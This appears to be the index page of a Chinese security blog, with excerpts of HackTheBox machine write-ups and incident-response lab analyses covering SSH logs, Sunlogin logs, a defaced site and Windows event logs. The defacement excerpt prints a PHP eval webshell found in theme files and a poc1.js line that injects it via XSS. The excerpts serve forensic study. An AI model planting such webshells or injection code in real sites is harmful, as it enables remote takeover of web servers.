Looking for light.

Archive

About

Xiaodi

  • HTB——Rebound

    0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__ \| (__ | (_| || | | |/ ___/ |...

  • 玄机——linux实战-CMS01

    上线后我们首先查看SSH的日志。处于/var/log/secure内。分析日志我们发现可疑IP [root@ip-10-0-10-4 log]# cat secure Mar 20 10:30:24 web-server sshd[1054]: Received SIGHUP; restarting. Mar 20 10:30:24 web-server sshd[1054]: Server listening on 0.0.0.0 port 22. Mar 20 10:30:24 web-server sshd[1054]: Server listening on :: port 22. Mar 20 10:30:25 web-server sshd[4111]: Accepted publickey for root from 127.0.0.1 port 55976 ssh2: ED25519...

  • 玄机——windows实战-向日葵

    右键定位向日葵文件位置,进入logs文件夹把日志文件拿出来,审计重心主要放在sunlogon文件上。 2024-03-26 10:15:38.534 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64076-->192.168.31.114:49724 2024-03-26 10:15:38.534 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64076, path: /, version: HTTP/1.1 2024-03-26 10:15:38.534 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64076,/, plugin:, session: 2024-03-26 10:16:25.570 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64246-->192.168.31.114:49724 2024-03-26 10:16:25.570 -...

  • 玄机——windows实战-黑页&篡改

    需要我们查找黑链添加在哪个文件中。快速定位到网站根目录,逐个查看文件内容。在/var/www/html下使用grep快速查找eval函数,我们就可以得到webshell的位置。 root@ip-10-0-10-1:/var/www/html# grep -rnE 'eval' . ./poc1.js:36: content.value = ('<?php @eval($_POST[a]); ?>\n') + oldData; ./usr/themes/default/404.php:2:<?php @eval($_POST[a]); ?> ./usr/themes/default/404.php:3:<?php @eval($_POST[a]); ?> ./usr/themes/default/404.php:4:<?php @eval($_POST[a]); ?> ./usr/themes/default/404.php:5:<?php @eval($_POST[a]); ?> ./usr/themes/default/404.php:6:<?php @eval($_POST[a]); ?> ./usr/themes/default/404.php:7:<?php @eval($_POST[a]); ?> 得到了webshell的位置。 root@ip-10-0-10-1:/var/www/html# grep -rnE '黑链' . ./usr/themes/default/header.php:24:<h3 style="text-align:center">模拟黑链</h3> 没想到此黑链的内容如此抽象,一般黑链寻找思路都是硬看。而网站根目录就放着一个一眼丁真的poc1.js,我们计算此js文件的ms5值并提交。 root@ip-10-0-10-1:/var/www/html# md5sum poc1.js 10c18029294fdec7b6ddab76d9367c14 poc1.js 最后的攻击入口分析。我们先筛选HTTP流内存在poc1.js的记录,并逐个查看 查看到一个数据包内容时,我们发现其时通过XSS调用的poc1.js 我们尝试追踪此HTTP流,查看完整的攻击逻辑。 我们发现,在注入XSS语句后,攻击者在再次访问相同路由时,会被重定向到/index.php/archives/1/,故攻击入口即为此url...

  • HTB--Toolbox

    0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | | (_| | (__| < │ │ \____/ |___/\___|_| \__,_|\___|_|\_\ │...

  • HTB——Sniper

    0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | | (_| | (__| < │ │ \____/ |___/\___|_| \__,_|\___|_|\_\ │...

  • HTB——Broker

    0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | | (_| | (__| < │ │ \____/ |___/\___|_| \__,_|\___|_|\_\ │...

  • 玄机——windows日志分析

    暂不清楚步骤一的扫描次数是要全访问记录还是单纯的后台扫描记录。经审计后发现只需要 S:\tools\应急\windows日志分析 λ awk '{print $1}' access.log | sort | uniq -c 169 127.0.0.1 524 192.168.150.1 54 192.168.150.33 1 192.168.150.60 6331 192.168.150.67 审计日志发现33与67IP进行了扫描行为,故次数为二者相加。 我们先转向RDP爆破失败记录的查看。在security日志内查看4625事件ID的次数,发现对方一共爆破了2594次RDP账密。 再次查看4624事件ID,查看都有哪些IP成功登陆过此机器。发现其中掺杂很多reboot时各机器账户的登陆记录,无法直接查看。我们在FullEventLogView中添加字段筛选,指定进程名为C:\Windows\System32\winlogon.exe,就可以查看所有用户操作登陆记录了。 注意不要把最后自己登陆的IP也提交上去。然后我们需要查看黑客创建的隐藏账号。使用lusrmgr.msc先查看用户&组内是否有记录。发现有一个hacker$和一个hackers$账户。感觉这俩一个是影子账户一个是隐藏账户,反正交就完事了。 接下来我们需要审计机器上的远程shell程序连接IP+端口,我们先使用机器直接给的D盾查杀一下。没有杀出有效数据,我们转向查看任务计划程序,发现一个非常可疑的计划任务。 因为是自启动,我们可以在注册表的windows/run其中找到后门文件的具体位置,且SC计划任务程序列表中选择操作,可以看到是由C:\Windows\Zh-CN\download.bat执行的此文件,故定时执行的名称即为此。使用微步云沙箱分析后门文件即可得到连接地址&IP

  • HTB——Resolute

    0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__ \| (__ | (_| || | | |/ ___/ |...

  • HTB——Perpection

    0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__ \| (__ | (_| || | | |/ ___/ |...